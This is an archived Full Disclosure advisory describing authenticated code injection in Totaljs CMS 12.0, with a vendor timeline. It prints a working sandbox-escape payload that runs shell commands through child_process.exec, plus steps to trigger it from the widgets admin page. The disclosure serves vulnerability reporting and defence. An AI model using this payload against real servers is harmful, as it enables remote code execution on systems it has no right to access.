| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <0e929d0b-34dd-8e29-4283-73a80795a41a@gmail.com> Date: Fri, 30 Aug 2019 19:46:49 +0200 From: paw <riccardo.krauter@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Totaljs CMS Authenticated Code injection on widget creation [+] Author/Discoverer: Riccardo Krauter @CertimeterGroup [+] Title: Totaljs CMS Authenticated Code injection on widget creation. [+] Affected software: Totaljs CMS 12.0 [+] Description: An authenticated user with “widgets” privilege can gain RCE on the remote server by creating a malicious widget with a special tag containing java-script code that will be evaluated server side. In the process of evaluating the tag by back-end is possible to escape the sandbox object by using the following payload: <script total>global.process.mainModule.require(‘child_process’).exec(‘RCE here’);</script> [+] Step to reproduce: 1) browse to http://localhost:8000/admin/widgets/ 2) click on create 3) paste the payload in the source code filed 4) click on save [+] Project link: https://github.com/totaljs/cms [+] Original report and details: https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf [+] Timeline: - 13/02/2019 -> reported the issue to the vendor .... many ping here - 18/06/2019 -> pinged the vendor last time - 30/08/2019 -> reported to seclist _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists